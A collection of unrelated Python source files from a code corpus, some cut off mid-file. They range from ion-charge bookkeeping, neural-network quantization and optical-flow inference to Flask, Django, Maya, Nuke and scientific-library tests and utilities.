reference_state_charge - The charge of a reference state (assumed to be charge neutral)
to_state_charge - Charge of a state that needs to be neutralized according to rule.
rule - The rule (see ``NeutralChargeRule`` used to determine ionic changes.
Returns
-------
delta_cations, delta_anions
"""
# No ions
if rule is NeutralChargeRule.NO_IONS:
return 0, 0
# Add or remove a counter charge
elif rule is NeutralChargeRule.COUNTER_IONS:
return _delta_ions_by_counter_charge(reference_state_charge, to_state_charge)
# Add or remove a replacement charge
elif rule is NeutralChargeRule.REPLACEMENT_IONS:
return _delta_ions_by_replacement_charge(
reference_state_charge, to_state_charge
)
def _delta_ions_by_counter_charge(
reference_state_charge: int, to_state_charge: int
) -> Tuple[int, int]:
"""Calculate the change in ionic composition between titration states using counter ion.
Parameters
----------
reference_state_charge - the charge of a single reference state for
"""
delta_cation = 0
delta_anion = 0
charge_to_counter = to_state_charge - reference_state_charge
counter = 0
while abs(charge_to_counter) > 0:
# The protonation state change annihilates a positive charge
if (reference_state_charge > 0 >= to_state_charge) or (
0 < to_state_charge < reference_state_charge
):
# annihilate a solvent anion
delta_anion -= 1
charge_to_counter += 1
reference_state_charge -= (
1
) # One part of the initial charge has been countered
# The protonation state change annihilates a negative charge
elif reference_state_charge < 0 <= to_state_charge or (
0 > to_state_charge > reference_state_charge
):
# annihilate a solvent cation
delta_cation -= 1
charge_to_counter -= 1
reference_state_charge += 1
# The protonation state change adds a negative charge
elif reference_state_charge == 0 > to_state_charge or (
0 > reference_state_charge > to_state_charge
):
# add a positive charge
delta_cation += 1
charge_to_counter += 1
reference_state_charge -= 1
# The protonation state adds a positive charge
elif (reference_state_charge == 0 < to_state_charge) or (
0 < reference_state_charge < to_state_charge
):
# add an anion
delta_anion += 1
charge_to_counter -= 1
reference_state_charge += 1
else:
raise ValueError("Impossible scenario reached.")
counter += 1
if counter > 10000:
raise RuntimeError(
"Infinite while loop predicted for salt resolution. Halting."
)
return delta_cation, delta_anion
def _delta_ions_by_replacement_charge(
reference_state_charge: int, to_state_charge: int
) -> Tuple[int, int]:
"""Calculate the change in ionic composition between titration states by adding replacement ion.
N.B.: This is similar to the approach employed by <NAME> Roux 2015. TODO add reference.
"""
# Note that we don't allow for direct transitions between ions of different charge.
delta_cation = 0
delta_anion = 0
charge_to_counter = to_state_charge - reference_state_charge
counter = 0
while abs(charge_to_counter) > 0:
# The protonation state change annihilates a positive charge
if (reference_state_charge > 0 >= to_state_charge) or (
0 < to_state_charge < reference_state_charge
):
delta_cation += 1
charge_to_counter += 1
reference_state_charge -= (
1
) # One part of the initial charge has been countered
# The protonation state change annihilates a negative charge
elif reference_state_charge < 0 <= to_state_charge or (
0 > to_state_charge > reference_state_charge
):
delta_anion += 1
charge_to_counter -= 1
reference_state_charge += 1
# The protonation state change adds a negative charge
elif reference_state_charge == 0 > to_state_charge or (
0 > reference_state_charge > to_state_charge
):
delta_anion -= 1
charge_to_counter += 1
reference_state_charge -= 1
# The protonation state adds a positive charge
elif (reference_state_charge == 0 < to_state_charge) or (
0 < reference_state_charge < to_state_charge
):
# remove cation
delta_cation -= 1
charge_to_counter -= 1
reference_state_charge += 1
else:
raise ValueError("Impossible scenario reached.")
counter += 1
if counter > 10000:
raise RuntimeError(
"Infinite while loop predicted for salt resolution. Halting."
)
return delta_cation, delta_anion
|
105602
|
import operator
from typing import List
import torch
from torch.fx import GraphModule
import mqbench.nn.qat as qnnqat
from mqbench.utils.logger import logger
from mqbench.utils.registry import register_model_quantizer
from mqbench.prepare_by_platform import BackendType
from mqbench.custom_quantizer import ModelQuantizer
class TRTModelQuantizer(ModelQuantizer):
"""The different points of TRT quantizer are how to deal with add op
and the last layer.
"""
def __init__(self, extra_quantizer_dict, extra_fuse_dict):
super().__init__(extra_quantizer_dict, extra_fuse_dict)
@property
def _merge_add_type(self):
return (torch.nn.Conv2d, torch.nn.Linear)
def _find_act_quants(self, model: GraphModule) -> set:
nodes = list(model.graph.nodes)
modules = dict(model.named_modules())
node_need_to_quantize_output = []
for node in nodes:
if ((node.op == "call_module" and node.target in self.exclude_module_name) or
((node.op == 'call_function' or node.op == 'call_method') and
node.target in self.exclude_function_type) or
node.name in self.exclude_node_name) and node.name not in self.additional_node_name:
continue
if (node.op == "call_module" and isinstance(modules[node.target], self.module_type_to_quant_input)) or \
((node.op == 'call_function' or node.op == 'call_method') and
node.target in self.function_type_to_quant_input) or node.name in self.additional_node_name:
# Add will be merged with previous conv.
input_node_list = list(filter(lambda x: isinstance(x, torch.fx.node.Node),
self._flatten_args(node.args)))
if node.target is operator.add:
merge_node = self._find_add_merge_node(model, input_node_list, node)
if merge_node:
input_node_list.remove(merge_node)
node_need_to_quantize_output.extend(input_node_list)
else:
for _node in input_node_list:
if self._is_implicit_merge(modules, (node, _node)):
continue
if isinstance(_node, torch.fx.node.Node):
node_need_to_quantize_output.append(_node)
return node_need_to_quantize_output
def _find_add_merge_node(self, model, input_node_list, node):
"""Find the first input node which has only one successor from the last.
This kind of node can be merge with add.
"""
input_node_list.reverse()
modules = dict(model.named_modules())
for input_node in input_node_list:
if input_node.op == 'call_module' and type(modules[input_node.target]) in self._merge_add_type:
succ = 0
for _node in list(model.graph.nodes):
_node_input_list = self._flatten_args(_node.args)
if input_node in _node_input_list:
succ += 1
if succ == 1:
return input_node
return None
@register_model_quantizer(BackendType.Tensorrt_NLP)
class TensorrtNLPQuantizer(ModelQuantizer):
"""
NLP model quantizer for Tensorrt settings.
We should quantize Linear / Embedding weights.
Linear / Matmul / Add layer inputs(activations).
We notice embedding add(word + pos + token_type) is not quantized,
so we find and skiped.
Add in MSA(add mask) should not be quantized either, we skipped it
by implicit_merge.
"""
@property
def implicit_merge_patterns(self) -> list:
# Layers which do not need quantize among them.
# In reversed order!
return [
(operator.add, operator.mul),
# Add in MSA block should not be quantized.
(operator.add, operator.truediv)
]
@property
def function_type_to_quant_input(self) -> list:
return [
operator.add,
# Matmul in MSA
torch.matmul
] + self.additional_function_type
@property
def module_type_to_quant_input(self) -> tuple:
return (
# Linear
torch.nn.qat.modules.linear.Linear,
) + self.additional_module_type
def _find_act_quants(self, model: GraphModule) -> List:
nodes = list(model.graph.nodes)
modules = dict(model.named_modules())
node_need_to_quantize_output = []
for node in nodes:
if ((node.op == "call_module" and node.target in self.exclude_module_name) or
((node.op == "call_function" or node.op == "all_method") and
node.target in self.exclude_function_type) or
node.name in self.exclude_node_name) and node.name not in self.additional_node_name:
logger.info("Exclude skip: {}".format(node.name))
continue
if (node.op == "call_module" and isinstance(modules[node.target], self.module_type_to_quant_input)) or \
((node.op == "call_function" or node.op == "call_method") and
node.target in self.function_type_to_quant_input) or node.name in self.additional_node_name:
input_node_list = self._flatten_args(node.args)
# Means this is not Tensor + Tensor.
if not all([isinstance(_node, torch.fx.node.Node) for _node in input_node_list]):
continue
# Embedding Add and MSA mask Add should be skipped.
if node.op == "call_function" and node.target == operator.add and \
self._is_skiped_add(node, modules, input_node_list):
continue
if node.op == "call_function" and node.target == operator.add:
import pdb
pdb.set_trace()
for _node in input_node_list:
if self._is_implicit_merge(modules, (node, _node)):
logger.info("Implicit merge: {} + {}".format(_node.name, node.name))
continue
node_need_to_quantize_output.append(_node)
return node_need_to_quantize_output
def _is_skiped_add(self, node, modules, input_node_list):
for _node in input_node_list:
if _node.op == "call_module" and isinstance(modules[_node.target], (qnnqat.Embedding, torch.nn.Embedding)):
logger.info("Skip embedding add: {}".format(node.name))
return True
|
105620
|
from gmtpy import GMT
gmt = GMT( config={'BASEMAP_TYPE':'fancy'})
gmt.pscoast( R='5/15/52/58', # region
J='B10/55/55/60/10c', # projection
B='4g4', # grid
D='f', # resolution
S=(114,159,207), # wet fill color
G=(233,185,110), # dry fill color
W='thinnest' ) # shoreline pen
gmt.save('example1.pdf')
gmt.save('example1.eps')
|
105643
|
import logging
import numpy as np
from typing import Dict, List, Tuple
from transformers import PreTrainedTokenizer
from transformers.tokenization_utils_base import BatchEncoding
class RstPreprocessor:
"""
Class for preprocessing a list of raw texts to a batch of tensors.
"""
def __init__(
self,
tokenizer: PreTrainedTokenizer = None
):
if tokenizer is not None:
self.tokenizer = tokenizer
else:
try:
import nltk
self.tokenizer = nltk.word_tokenize
except ModuleNotFoundError:
logging.warning('The package "nltk" is not installed!')
logging.warning('Please install "nltk" with "pip install nltk"')
def __call__(self, sentences: List[str]):
"""
Main method to start preprocessing for RST.
Args:
sentences (List[str]): list of input texts
Returns:
Tuple[BatchEncoding, List[int]]: return a BatchEncoding instance with key 'data_batch' and embedded values
of data batch. Also return a list of lengths of each text in the batch.
"""
tokenized_sentences = [np.array(self.tokenizer(sentence)) for sentence in sentences]
character_ids, sentence_lengths = self.get_elmo_char_ids(tokenized_sentences)
return character_ids, tokenized_sentences, sentence_lengths
def get_elmo_char_ids(self, tokenized_sentences: List[str]):
"""
Method to get elmo embedding from a batch of texts.
Args:
tokenized_sentences (List[str]): list of input texts
Returns:
Dict[str, List]: return a dictionary of elmo embeddings
"""
from allennlp.modules.elmo import batch_to_ids
sentence_lengths = [len(data) for data in tokenized_sentences]
character_ids = batch_to_ids(tokenized_sentences)
character_ids = character_ids
return character_ids, sentence_lengths
|
105655
|
import errno
import os
import random
import socket
import time
import unittest
import docker.client
from sourced.ml.core.utils.bblfsh import BBLFSH_VERSION_HIGH, BBLFSH_VERSION_LOW, check_version
@unittest.skipIf(os.getenv("SKIP_BBLFSH_UTILS_TESTS", False), "Skip ml_core.utils.bblfsh tests.")
class BblfshUtilsTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.docker_client = docker.from_env()
# ensure docker is running
try:
cls.docker_client.containers.list()
except Exception:
raise Exception("docker not running properly")
cls.er_msg = "supported bblfshd versions: " \
">=%s,<%s" % (BBLFSH_VERSION_LOW, BBLFSH_VERSION_HIGH)
def __check_bblfsh_version_support(self, version: str) -> bool:
"""
:param version: version of bblfshd to check
:return: True if version is supported, False otherwise
"""
with socket.socket() as s:
for _ in range(3):
try:
port = random.randint(10000, 50000)
s.connect(("localhost", port))
except socket.error as e:
if e.errno == errno.ECONNREFUSED:
break
container = self.docker_client.containers.run(
image="bblfsh/bblfshd:%s" % version,
privileged=True,
detach=True,
ports={"9432": port},
)
assert container is not None, "failed to create bblfsh container"
for _ in range(10):
try:
res = check_version(port=port)
break
except Exception:
time.sleep(.1)
pass
container.stop()
container.remove()
return res
def test_v200(self):
self.assertFalse(self.__check_bblfsh_version_support("v2.0.0"), self.er_msg)
def test_v210(self):
self.assertFalse(self.__check_bblfsh_version_support("v2.1.0"), self.er_msg)
def test_v220(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.2.0"), self.er_msg)
def test_v230(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.3.0"), self.er_msg)
def test_v240(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.4.0"), self.er_msg)
def test_v250(self):
self.assertTrue(self.__check_bblfsh_version_support("v2.5.0"), self.er_msg)
@classmethod
def tearDownClass(cls):
cls.docker_client.close()
if __name__ == "__main__":
unittest.main()
|
105669
|
from decimal import Decimal
from typing import Iterable, Optional, TypeVar
from stock_indicators._cslib import CsIndicator
from stock_indicators._cstypes import List as CsList
from stock_indicators._cstypes import Decimal as CsDecimal
from stock_indicators._cstypes import to_pydecimal
from stock_indicators.indicators.common.helpers import RemoveWarmupMixin
from stock_indicators.indicators.common.results import IndicatorResults, ResultBase
from stock_indicators.indicators.common.quote import Quote
def get_kama(quotes: Iterable[Quote], er_periods: int = 10,
fast_periods: int = 2, slow_periods: int = 30):
"""Get KAMA calculated.
Kaufman’s Adaptive Moving Average (KAMA) is an volatility
adaptive moving average of Close price over configurable lookback periods.
Parameters:
`quotes` : Iterable[Quote]
Historical price quotes.
`er_periods` : int, defaults 10
Number of Efficiency Ratio (volatility) periods.
`fast_periods` : int, defaults 2
Number of periods in the Fast EMA.
`slow_periods` : int, defaults 30
Number of periods in the Slow EMA.
Returns:
`KAMAResults[KAMAResult]`
KAMAResults is list of KAMAResult with providing useful helper methods.
See more:
- [KAMA Reference](https://daveskender.github.io/Stock.Indicators.Python/indicators/Kama/#content)
- [Helper Methods](https://daveskender.github.io/Stock.Indicators.Python/utilities/#content)
"""
results = CsIndicator.GetKama[Quote](CsList(Quote, quotes), er_periods,
fast_periods, slow_periods)
return KAMAResults(results, KAMAResult)
class KAMAResult(ResultBase):
"""
A wrapper class for a single unit of Kaufman’s Adaptive Moving Average (KAMA) results.
"""
@property
def efficiency_ratio(self) -> Optional[float]:
return self._csdata.ER
@efficiency_ratio.setter
def efficiency_ratio(self, value):
self._csdata.ER = value
@property
def kama(self) -> Optional[Decimal]:
return to_pydecimal(self._csdata.Kama)
@kama.setter
def kama(self, value):
self._csdata.Kama = CsDecimal(value)
_T = TypeVar("_T", bound=KAMAResult)
class KAMAResults(RemoveWarmupMixin, IndicatorResults[_T]):
"""
A wrapper class for the list of Kaufman’s Adaptive Moving Average (KAMA) results.
It is exactly same with built-in `list` except for that it provides
some useful helper methods written in CSharp implementation.
"""
|
105702
|
from bluesky import Msg
from bluesky.callbacks.olog import logbook_cb_factory
text = []
def f(**kwargs):
text.append(kwargs['text'])
def test_default_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert len(text[0]) > 0
def test_trivial_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert text[0] == 'hello'
# smoke test the long_template
RE.subscribe(logbook_cb_factory(f, long_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
def test_template_dispatch(RE):
disp = {'a': 'A', 'b': 'B'}
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
assert text[0] == 'A'
assert text[1] == 'B'
# smoke test the long_dispatch
RE.subscribe(logbook_cb_factory(f, long_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
|
105704
|
from unittest import TestCase
from pykalman.sqrt import BiermanKalmanFilter
from pykalman.tests.test_standard import KalmanFilterTests
from pykalman.datasets import load_robot
class BiermanKalmanFilterTestSuite(TestCase, KalmanFilterTests):
"""Run Kalman Filter tests on the UDU' Decomposition-based Kalman Filter"""
def setUp(self):
self.KF = BiermanKalmanFilter
self.data = load_robot()
|
105733
|
import flask
import os
from dotenv import load_dotenv
from pathlib import Path
import sys
sys.path.append('fraud_graph/')
import fraud_times.quiz_statistics as quiz_stats
import fraud_times.quiz_orm as quiz_orm
import get_scores as get_scores
import create_dataset2 as create_dataset
import json
# Does not override env vars, so docker-compose shall set env vars if run. Otherwise, sets env vars from .env file
load_dotenv()
app = flask.Flask(__name__)
@app.route('/time/quiz/<quizId>')
def quizFraudScores(quizId):
db = quiz_orm.QuizzesDBConnector()
quiz = db.get_quiz(quizId)
statistic = quiz_stats.Quiz_Statistic(
quiz, quiz_stats.QUIZ_SCORERS["Diff. Mean (Question ID)"])
result = {"scores": [{"userInfo": db.getAuthUserInformationByUserId(user_id).to_dict(), "score": user_score}
for user_id, user_score in statistic.statistic.items()]}
return flask.jsonify(result)
@app.route('/communication/quiz/<quizId>')
def quizFraudScoresGraph(quizId):
data = create_dataset.create_dataset(quizId, "*")
scores_in, scores_out = get_scores.create_network(
"All", data, True, True, 1)
db = quiz_orm.QuizzesDBConnector()
scores_in = [{"userInfo": db.getAuthUserInformationByUsername(username).to_dict(), "score": user_score}
for username, user_score in scores_in.items()]
scores_out = [{"userInfo": db.getAuthUserInformationByUsername(username).to_dict(), "score": user_score}
for username, user_score in scores_out.items()]
return flask.jsonify({"scoresIn": scores_in, "scoresOut": scores_out})
|
105749
|
from django.core import mail
from django.test.utils import override_settings
from base.tests.base import SeleniumTestCase
CAPTCHA = 'test'
@override_settings(CAPTCHA=CAPTCHA)
class ContactFormTest(SeleniumTestCase):
def test_contact_form(self):
self.assertEqual(mail.outbox, [])
username = 'john'
usermail = '<EMAIL>'
message = 'this is a message'
self.navigate('base:contact_form')
username_textfield = self.driver.find_element_by_name('name')
username_textfield.send_keys(username)
mail_textfield = self.driver.find_element_by_name('email')
mail_textfield.send_keys(usermail)
message_textarea = self.driver.find_element_by_name('body')
message_textarea.send_keys(message)
message_textarea = self.driver.find_element_by_name('captcha')
message_textarea.send_keys(CAPTCHA)
with self.wait():
message_textarea.submit()
self.assert_view('base:contact_form_sent')
self.assertEqual(len(mail.outbox), 1)
body: mail.EmailMessage = mail.outbox[0].body
self.assertIn(username, body)
self.assertIn(message, body)
self.assertIn(usermail, body)
|
105766
|
import re
from collections import deque
def parse(script):
"""Parse Nuke node's TCL script string into nested list structure
Args:
script (str): Node knobs TCL script string
Returns:
Tablet: A list containing knob scripts or tab knobs that has parsed
into list
"""
queue = deque(script.split("\n"))
tab = Tablet()
tab.consume(queue)
return tab
TYPE_NODE = 0
TYPE_KNOBS = 1
TYPE_GROUP = -2
TYPE_KNOBS_CLOSE = -1
TYPE_GROUP_CLOSE = -3
TAB_PATTERN = re.compile(
'addUserKnob {20 '
'(?P<name>\\S+)'
'(| l (?P<label>".*"|\\S+))'
'(| n (?P<type>1|-[1-3]))'
'}'
)
class Tablet(list):
"""
"""
def __init__(self, name=None, label=None, type=None, parent=None):
self.name = name
self.label = label
self.type = type
self.parent = parent
self[:] = list()
self.tab_closed = False
self.not_in_group = type is not None and type != TYPE_GROUP
def __eq__(self, other):
return "@" + self.name == other
def find_tab(self, name):
"""Return child tab if exists in list"""
return next((item for item in self if item == "@" + name), None)
def consume(self, queue):
"""
"""
def under_root():
return getattr(self.parent, "parent", None) is not None
def ignore_tab_value(name):
if queue and queue[0] == "%s 1" % name:
queue.popleft()
while queue:
line = queue.popleft()
if not line:
continue
matched = TAB_PATTERN.search(line)
if matched:
tab_profile = matched.groupdict()
name = tab_profile["name"]
label = tab_profile["label"]
type = int(tab_profile["type"] or 0)
else:
self.append(line)
continue
ignore_tab_value(name)
if type in (TYPE_KNOBS_CLOSE, TYPE_GROUP_CLOSE):
self.parent.tab_closed = True
return
elif type == TYPE_NODE:
if self.not_in_group:
queue.appendleft(line)
return
tab = Tablet(name, label, type=type, parent=self)
self.append(tab)
tab.consume(queue)
if self.tab_closed and under_root():
return
def merge(self, other):
"""
"""
for item in other:
if isinstance(item, Tablet):
tab = self.find_tab(item.name)
if tab is not None:
tab.merge(item)
continue
self.append(item)
def to_script(self, join=True):
"""
"""
script = list()
for item in self:
if isinstance(item, Tablet):
sub_script = item.to_script(join=False)
line = "addUserKnob {20 " + item.name
if item.label is not None:
line += " l " + item.label
if item.type == TYPE_NODE:
sub_script.insert(0, line + "}")
elif item.type == TYPE_KNOBS:
sub_script.insert(0, line + " n 1}")
sub_script.append(line + " n -1}")
elif item.type == TYPE_GROUP:
sub_script.insert(0, line + " n -2}")
sub_script.append(line + " n -3}")
script += sub_script
continue
script.append(item)
return "\n".join(script) if join else script
|
105775
|
from __future__ import print_function
import sys
import cv2
import pdb
import argparse
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import time
from utils.io import mkdir_p
from utils.util_flow import write_flow, save_pfm
from utils.flowlib import point_vec, warp_flow
cudnn.benchmark = False
parser = argparse.ArgumentParser(description='VCN+expansion')
parser.add_argument('--dataset', default='2015',
help='KITTI version')
parser.add_argument('--datapath', default='/ssd/kitti_scene/training/',
help='dataset path')
parser.add_argument('--loadmodel', default=None,
help='model path')
parser.add_argument('--outdir', default='output',
help='output dir')
parser.add_argument('--testres', type=float, default=1,
help='resolution')
parser.add_argument('--maxdisp', type=int ,default=256,
help='maxium disparity. Only affect the coarsest cost volume size')
parser.add_argument('--fac', type=float ,default=1,
help='controls the shape of search grid. Only affect the coarse cost volume size')
args = parser.parse_args()
# dataloader
if args.dataset == '2015':
from dataloader import kitti15list as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == '2015val':
from dataloader import kitti15list_val as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == '2015vallidar':
from dataloader import kitti15list_val_lidar as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == '2015test':
from dataloader import kitti15list as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == 'seq':
from dataloader import seqlist as DA
maxw,maxh = [int(args.testres*1280), int(args.testres*384)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == 'sinteltest':
from dataloader import sintellist as DA
maxw,maxh = [int(args.testres*1024), int(args.testres*448)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
elif args.dataset == 'sintel':
from dataloader import sintellist_val as DA
maxw,maxh = [int(args.testres*1024), int(args.testres*448)]
test_left_img, test_right_img ,_= DA.dataloader(args.datapath)
max_h = int(maxh // 64 * 64)
max_w = int(maxw // 64 * 64)
if max_h < maxh: max_h += 64
if max_w < maxw: max_w += 64
maxh = max_h
maxw = max_w
mean_L = [[0.33,0.33,0.33]]
mean_R = [[0.33,0.33,0.33]]
# construct model, VCN-expansion
from models.VCN_exp import VCN
model = VCN([1, maxw, maxh], md=[int(4*(args.maxdisp/256)),4,4,4,4], fac=args.fac,
exp_unc=('robust' in args.loadmodel)) # expansion uncertainty only in the new model
model = nn.DataParallel(model, device_ids=[0])
model.cuda()
if args.loadmodel is not None:
pretrained_dict = torch.load(args.loadmodel)
mean_L=pretrained_dict['mean_L']
mean_R=pretrained_dict['mean_R']
pretrained_dict['state_dict'] = {k:v for k,v in pretrained_dict['state_dict'].items()}
model.load_state_dict(pretrained_dict['state_dict'],strict=False)
else:
print('dry run')
print('Number of model parameters: {}'.format(sum([p.data.nelement() for p in model.parameters()])))
mkdir_p('%s/%s/'% (args.outdir, args.dataset))
def main():
model.eval()
ttime_all = []
for inx in range(len(test_left_img)):
print(test_left_img[inx])
imgL_o = cv2.imread(test_left_img[inx])[:,:,::-1]
imgR_o = cv2.imread(test_right_img[inx])[:,:,::-1]
# for gray input images
if len(imgL_o.shape) == 2:
imgL_o = np.tile(imgL_o[:,:,np.newaxis],(1,1,3))
imgR_o = np.tile(imgR_o[:,:,np.newaxis],(1,1,3))
# resize
maxh = imgL_o.shape[0]*args.testres
maxw = imgL_o.shape[1]*args.testres
max_h = int(maxh // 64 * 64)
max_w = int(maxw // 64 * 64)
if max_h < maxh: max_h += 64
if max_w < maxw: max_w += 64
input_size = imgL_o.shape
imgL = cv2.resize(imgL_o,(max_w, max_h))
imgR = cv2.resize(imgR_o,(max_w, max_h))
# flip channel, subtract mean
imgL = imgL[:,:,::-1].copy() / 255. - np.asarray(mean_L).mean(0)[np.newaxis,np.newaxis,:]
imgR = imgR[:,:,::-1].copy() / 255. - np.asarray(mean_R).mean(0)[np.newaxis,np.newaxis,:]
imgL = np.transpose(imgL, [2,0,1])[np.newaxis]
imgR = np.transpose(imgR, [2,0,1])[np.newaxis]
# modify module according to inputs
from models.VCN_exp import WarpModule, flow_reg
for i in range(len(model.module.reg_modules)):
model.module.reg_modules[i] = flow_reg([1,max_w//(2**(6-i)), max_h//(2**(6-i))],
ent=getattr(model.module, 'flow_reg%d'%2**(6-i)).ent,\
maxdisp=getattr(model.module, 'flow_reg%d'%2**(6-i)).md,\
fac=getattr(model.module, 'flow_reg%d'%2**(6-i)).fac).cuda()
for i in range(len(model.module.warp_modules)):
model.module.warp_modules[i] = WarpModule([1,max_w//(2**(6-i)), max_h//(2**(6-i))]).cuda()
# forward
imgL = Variable(torch.FloatTensor(imgL).cuda())
imgR = Variable(torch.FloatTensor(imgR).cuda())
with torch.no_grad():
imgLR = torch.cat([imgL,imgR],0)
model.eval()
torch.cuda.synchronize()
start_time = time.time()
rts = model(imgLR)
torch.cuda.synchronize()
ttime = (time.time() - start_time); print('time = %.2f' % (ttime*1000) )
ttime_all.append(ttime)
flow, occ, logmid, logexp = rts
# upsampling
occ = cv2.resize(occ.data.cpu().numpy(), (input_size[1],input_size[0]),interpolation=cv2.INTER_LINEAR)
logexp = cv2.resize(logexp.cpu().numpy(), (input_size[1],input_size[0]),interpolation=cv2.INTER_LINEAR)
logmid = cv2.resize(logmid.cpu().numpy(), (input_size[1],input_size[0]),interpolation=cv2.INTER_LINEAR)
flow = torch.squeeze(flow).data.cpu().numpy()
flow = np.concatenate( [cv2.resize(flow[0],(input_size[1],input_size[0]))[:,:,np.newaxis],
cv2.resize(flow[1],(input_size[1],input_size[0]))[:,:,np.newaxis]],-1)
flow[:,:,0] *= imgL_o.shape[1] / max_w
flow[:,:,1] *= imgL_o.shape[0] / max_h
flow = np.concatenate( (flow, np.ones([flow.shape[0],flow.shape[1],1])),-1)
# save predictions
idxname = test_left_img[inx].split('/')[-1]
with open('%s/%s/flo-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,flow[::-1].astype(np.float32))
flowvis = point_vec(imgL_o, flow)
cv2.imwrite('%s/%s/visflo-%s.jpg'% (args.outdir, args.dataset,idxname),flowvis)
imwarped = warp_flow(imgR_o, flow[:,:,:2])
cv2.imwrite('%s/%s/warp-%s.jpg'% (args.outdir, args.dataset,idxname),imwarped[:,:,::-1])
with open('%s/%s/occ-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,occ[::-1].astype(np.float32))
with open('%s/%s/exp-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,logexp[::-1].astype(np.float32))
with open('%s/%s/mid-%s.pfm'% (args.outdir, args.dataset,idxname.split('.')[0]),'w') as f:
save_pfm(f,logmid[::-1].astype(np.float32))
torch.cuda.empty_cache()
print(np.mean(ttime_all))
if __name__ == '__main__':
main()
|
105799
|
import sys
import os
import unittest
import maya.cmds as cmds
import maya.OpenMaya as om
import maya.OpenMayaAnim as oma
import maya.OpenMayaFX as omfx
import pymel.versions
from pymel.util.testing import TestCaseExtended
if not hasattr(cmds, 'about'):
import maya.standalone
maya.standalone.initialize()
#===============================================================================
# Current Bugs
#===============================================================================
# For CURRENT bugs, we PASS is the bug is still present, and FAIL if it goes
# away... this may be counter-intuitive, but it acts as an alert if a bug is
# fixed (so we can possibly get rid of yucky work-around code...)
# Bug report 378211
class TestConstraintAngleOffsetQuery(TestCaseExtended):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
for cmdName in ('aimConstraint', 'orientConstraint'):
cube1 = cmds.polyCube()[0]
cube2 = cmds.polyCube()[0]
cmd = getattr(cmds, cmdName)
constraint = cmd(cube1, cube2)[0]
setVals = (12, 8, 7)
cmd(constraint, e=1, offset=setVals)
getVals = tuple(cmd(constraint, q=1, offset=1))
# self.assertVectorsEqual(setVals, getVals)
# check that things are BAD!
try:
self.assertVectorsEqual(setVals, getVals)
except AssertionError:
pass
else:
self.fail("TestConstraintAngleOffsetQuery was fixed! Huzzah!")
# Bug report 378192
class TestEmptyMFnNurbsCurve(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
shapeStr = cmds.createNode('nurbsCurve', n="RigWorldShape")
selList = om.MSelectionList()
selList.add(shapeStr)
node = om.MObject()
selList.getDependNode(0, node)
mnc = om.MFnNurbsCurve()
self.assertTrue(mnc.hasObj(node))
# try:
# mnc.setObject(node)
# except Exception:
# self.fail("MFnNurbs curve doesn't work with empty curve object")
# check that things are BAD!
try:
mnc.setObject(node)
except Exception:
pass
else:
self.fail("MFnNurbs curve now works with empty curve objects! Yay!")
# Bug report 344037
class TestSurfaceRangeDomain(unittest.TestCase):
def setUp(self):
cmds.file(new=1, f=1)
def runTest(self):
try:
# create a nurbs sphere
mySphere = cmds.sphere()[0]
# a default sphere should have u/v
# parameter ranges of 0:4/0:8
# The following selections should
# result in one of these:
desiredResults = ('nurbsSphere1.u[2:3][0:8]',
'nurbsSphere1.u[2:3][*]',
'nurbsSphere1.u[2:3]',
'nurbsSphere1.uv[2:3][0:8]',
'nurbsSphere1.uv[2:3][*]',
'nurbsSphere1.uv[2:3]',
'nurbsSphere1.v[0:8][2:3]',
'nurbsSphere1.v[*][2:3]')
# Passes
cmds.select('nurbsSphere1.u[2:3][*]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Passes
cmds.select('nurbsSphere1.v[*][2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphere1.u[2:3][0:1]'
cmds.select('nurbsSphere1.u[2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Fails! - returns 'nurbsSphere1.u[2:3][0:1]'
cmds.select('nurbsSphere1.uv[2:3][*]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# The following selections should
# result in one of these:
desiredResults = ('nurbsSphere1.u[0:4][2:3]',
'nurbsSphere1.u[*][2:3]',
'nurbsSphere1.uv[0:4][2:3]',
'nurbsSphere1.uv[*][2:3]',
'nurbsSphere1.v[2:3][0:4]',
'nurbsSphere1.v[2:3][*]',
'nurbsSphere1.v[2:3]')
# Passes
cmds.select('nurbsSphere1.u[*][2:3]')
self.assertTrue(cmds.ls(sl=1)[0] in desiredResults)
# Passes
cmds.select('nurbsSphere1.v[2:3][*]')
